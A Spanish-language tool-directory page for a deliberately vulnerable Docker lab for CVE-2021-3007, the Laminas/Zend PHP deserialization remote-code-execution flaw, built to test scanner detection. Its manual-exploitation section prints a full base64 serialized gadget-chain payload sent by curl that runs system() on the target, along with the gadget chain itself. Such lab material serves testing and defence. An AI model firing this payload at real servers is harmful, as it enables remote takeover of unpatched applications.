Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2021-3007-vulnerable — CVE-2021-3007 Entorno de Prueba Vulnerable - Deserialización RCE de Laminas/Zend Framework | Kitploit
Herramientas/GitHubGitHub/kre80r/cve-2021-3007-vulnerable
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubkre80r/cve-2021-3007-vulnerable

cve-2021-3007-vulnerable

CVE-2021-3007 Entorno de Prueba Vulnerable - Deserialización RCE de Laminas/Zend Framework

Ver Repositorio
hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-3007 Entorno de Prueba Vulnerable

Docker CVE CVSS

Entorno de prueba intencionadamente vulnerable para validar la detección de CVE-2021-3007 en escáneres de seguridad.

Resumen de la Vulnerabilidad

AtributoValor
CVE IDCVE-2021-3007
GravedadCrítica (CVSS 9.8)
TipoDeserialización Insegura → RCE
AfectadoLaminas HTTP < 2.14.2, Zend Framework 3.0.0
CWECWE-502 (Deserialización de Datos No Confiables)

Inicio Rápido

root@kitploit:~
# Clone repository
git clone https://github.com/KrE80r/CVE-2021-3007-vulnerable
cd CVE-2021-3007-vulnerable

# Start vulnerable environment
docker-compose up -d

# Verify it's running
curl http://localhost:8080

# Test with nuclei (optional)
nuclei -t CVE-2021-3007.yaml -u http://localhost:8080

# Cleanup
docker-compose down

Comando Único

root@kitploit:~
docker-compose up -d && sleep 3 && curl -s http://localhost:8080 | head -1

Prueba de Explotación Manual

root@kitploit:~
# Send serialized payload triggering RCE
curl -X POST http://localhost:8080/ \
  -d "data=TzoyODoiTGFtaW5hc1xIdHRwXFJlc3BvbnNlXFN0cmVhbSI6Mjp7czoxMDoiACoAY2xlYW51cCI7YjoxO3M6MTM6IgAqAHN0cmVhbU5hbWUiO086Mjg6IkxhbWluYXNcVmlld1xIZWxwZXJcR3JhdmF0YXIiOjI6e3M6NzoiACoAdmlldyI7TzozMzoiTGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyIjoxOntzOjQ0OiIATGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyAF9faGVscGVycyI7TzoyMToiTGFtaW5hc1xDb25maWdcQ29uZmlnIjoxOntzOjc6IgAqAGRhdGEiO2E6Mjp7czoxMDoiZXNjYXBlaHRtbCI7czo2OiJzeXN0ZW0iO3M6MTQ6ImVzY2FwZWh0bWxhdHRyIjtzOjE3OiJmaWxlX2dldF9jb250ZW50cyI7fX19czoxMzoiACoAYXR0cmlidXRlcyI7YToxOntzOjIyOiJlY2hvIG51Y2xlaUNWRTIwMjEzMDA3IjtpOjE7fX19"

# Expected: Response contains "nucleiCVE20213007" confirming RCE

Detalles Técnicos

Cadena de Gadgets

root@kitploit:~
Laminas\Http\Response\Stream::__destruct()
  └─► Laminas\View\Helper\Gravatar::__toString()
        └─► Laminas\View\Renderer\PhpRenderer::plugin()
              └─► Laminas\Config\Config::get()
                    └─► system() / file_get_contents()

Componentes Vulnerables

PaqueteVersionPropósito
laminas/laminas-http2.14.1Componente HTTP vulnerable
laminas/laminas-view2.12.0Componente de cadena de gadgets
laminas/laminas-config3.7.0Componente de cadena de gadgets

Endpoints Vulnerables

La aplicación acepta datos serializados mediante POST:

  • Ruta: / o /index.php
  • Parámetros: data, payload, serialized
  • Codificación: Base64

Detalles del Entorno

ComponenteValor
Imagen basephp:8.1-apache
Puerto8080
Contenedorcve-2021-3007-vulnerable

Archivos

root@kitploit:~
.
├── Dockerfile          # Container build configuration
├── docker-compose.yml  # Orchestration (one-shot setup)
├── index.php           # Vulnerable PHP application
├── LICENSE             # MIT License
└── README.md           # This file

Aviso de Seguridad

ADVERTENCIA: Este entorno es intencionadamente vulnerable solo para fines de pruebas de seguridad.

NO:

  • Exponer a redes públicas
  • Implementar en entornos de producción
  • Dejar ejecutándose sin supervisión
  • Usar con fines maliciosos

SÍ:

  • Usar en entornos de prueba aislados
  • Detener contenedores cuando no se utilicen
  • Usar solo para investigación de seguridad legítima

Referencias

  • NVD - CVE-2021-3007
  • Aviso de GitHub - GHSA-xx8f-qf9f-5fgw
  • Comunicado de Seguridad de Laminas
  • Investigación de CheckPoint - FreakOut
  • Investigación de Ambionics

Licencia

Licencia MIT - Solo para fines de investigación de seguridad y educativos.


Creado para validación de plantillas de nuclei | projectdiscovery/nuclei-templates

Descargar herramienta